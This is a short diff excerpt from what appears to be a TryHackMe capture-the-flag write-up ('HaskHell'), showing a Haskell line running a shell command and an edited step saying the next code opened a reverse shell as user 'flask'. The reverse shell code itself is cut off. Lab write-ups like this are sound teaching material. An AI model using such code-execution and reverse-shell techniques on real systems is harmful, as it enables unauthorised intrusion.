ChrisPritchard/ctf-writeups/tryhackme/haskhell.md

 main = system "ls"
 ```

-4. The following connected a reverse shell (as 'flask'):
+4. The following connected a reverse shell (as the user 'flask'):

 ```haskell
 import System.Cmd